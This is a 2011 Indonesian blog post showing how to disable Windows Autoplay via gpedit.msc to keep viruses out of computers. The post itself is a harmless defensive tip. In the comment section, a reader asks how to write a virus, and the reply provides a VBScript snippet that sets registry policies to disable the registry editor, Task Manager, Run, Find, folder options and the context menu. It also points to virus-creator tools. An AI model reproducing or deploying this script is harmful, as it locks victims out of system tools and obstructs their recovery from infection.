Skip to content

Cara mencegah VIRUS masuk dari removable disk ke komputer

July 6, 2011

Wah dah lama g post nie kayak.e gue N nie gue mw ngepost tips bagaimana cara menahan virus agar tidak masuk kedalam komputer. Caranya dengan mematikan Autoplay yang ada dalam settingan gpedit.msc mw tw caranya??. Liat baik2 tutorial dibawah ini.

cara pertama buka “run” dengan cara klik pada start kemudian pilih pada run seperti gambar dibawah ini

Setelah diklik “run” maka akan muncul tampilan seperti di bawah lalu ketikan “gpedit.msc” tanpa tanda ”

Bila sudah akan muncul tampilan seperti ini

Kemudian klik system dan akan muncul list dsampingnya kemudian pilih turnof f autoplay  kemudian pada settingan pilih enable. bila kurang jelas lihat gambar di bawah ini!!.

Jika sudah dlakukan dengan benar liatlah perbedaaannya.

Ok guys  thanx 4 ur attention.

2 Comments leave one →
  1. July 31, 2011 8:22 am

    uhummm…caranya buat virus dr vb eip???

    • August 1, 2011 8:09 am

      ada seh tap ni virus.e lemah . .

      On Error Resume Next
      CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableRegistryTools”, “1”, “REG_DWORD”
      CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\DisableTaskMgr”, “1”, “REG_DWORD”
      CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFolderOptions”, “1”, “REG_DWORD”
      CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoRun”, “1”, “REG_DWORD”
      CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoFind”, “1”, “REG_DWORD”
      CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\NoViewContextMenu”, “1”, “REG_DWORD”
      CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\Explorer\Advanced\Hidden”, “1”, “REG_DWORD”

      trus kalo pengen dalemi pake virus creator aja . .
      tapi thu masih lemah . .

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: